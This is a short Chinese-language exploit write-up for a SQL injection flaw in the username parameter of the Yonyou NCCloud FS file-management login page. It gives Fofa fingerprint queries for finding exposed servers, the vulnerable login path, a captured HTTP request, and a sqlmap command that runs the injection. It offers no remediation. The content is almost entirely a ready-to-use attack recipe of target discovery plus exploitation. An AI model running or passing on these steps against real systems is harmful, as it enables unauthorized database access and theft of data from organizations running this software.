用友 NCCloud FS 檔案管理 SQL 注入
用友NCCloud FS檔案管理登入頁面對使用者名稱引數沒有過濾,存在SQL隱碼攻擊。
Fofa:"/platform/yonyou-yyy.js" 、app="用友-NC-Cloud" && icon_hash="1596996317"
nccloud登入介面:
檔案伺服器管理登入頁面:
http://x.x.x.x/fs/
username引數存在注入,抓取登入資料包:
GET /fs/console?username=1&password=00PGRLxSTe3VroI21qJNymCrZfPX1UQ4ij0gIWn2Gc4%3D HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://x.x.x.x/fs/
Cookie: JSESSIONID=FFAE8EF48BD3BEF7E94B5449B8F9BA90.server
Upgrade-Insecure-Requests: 1
sqlmap跑注入:
sqlmap -r test.txt -p username
